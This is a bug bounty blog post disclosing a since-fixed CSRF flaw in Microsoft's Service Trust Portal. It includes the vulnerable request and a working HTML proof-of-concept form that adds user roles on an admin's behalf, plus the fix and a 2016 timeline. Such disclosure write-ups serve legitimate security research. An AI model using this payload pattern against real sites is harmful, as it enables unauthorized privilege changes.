Microsoft - CSRF Bug - Add Users in their Cloud Service Trust Portal



In this blog post I will show you one of the easy CSRF Bug which I Found on Microsoft Platform, not only that, I will reiterate why it is important to keep trying.

If you are my follower @Twitter then you must be knowing I sometimes sorry regularly tweet about NeverGiveUp sort of tweets the best reason I can tell you by giving example of my experience with Microsoft Bug bounty Program.

Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I reported 10+ bug reports to Microsoft security team this includes some low hanging fruits and some bugs which I was not able to exploit. All marked as NA.  Well its but obvious after all this failure when my mind tells me to give up on this, I tell myself.




So After spending hours,days and months I finally got the HIT call SUCCESS.
(Keep Trying #NeverGiveUp)

Lets move towards POC.

Introduction:-

I was testing one of Microsoft domain - Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin.


The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute (Some tips to try in a wild ...XD) , so that time straight away I though about CSRF.


POC:- 

HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive

From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.

Exploitation:- 

<html>
  <body>
    <form action="https://trustportal.office.com/onboarding/AddUserRole/1110">
      <input type="hidden" name="role" value="User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.

How they fix it:- 

POST /onboarding/AddUserRole HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Content-Length: 29
Cookie: [Some_value]
Connection: keep-alive

{"user":"test","role":"User"}

They listed me in their Hall Of Fame and Rewarded me with the bounty.

Moral Of The Story:- 
Stay focused, Don't Quit, keep trying #BelieveThat

Time-Line:

Vulnerability timeline:

Feb 14, 2016   : Reported to Microsoft Security Response Center.
Feb 20, 2016  :   Received initial reply from Microsoft  Team. Report Triaged
Feb 25, 2016  :   Microsoft Security Team successfully reproduced the bug.
Mar 16, 2016  :  Microsoft Security Team  Fixed the reported bug.
Apr 01, 2016  :  Bounty Awarded of $500 by Microsoft
June 19, 2016 :  Public responsible disclosure


Share this

Related Posts

Previous
Next Post »

4 comments

Write comments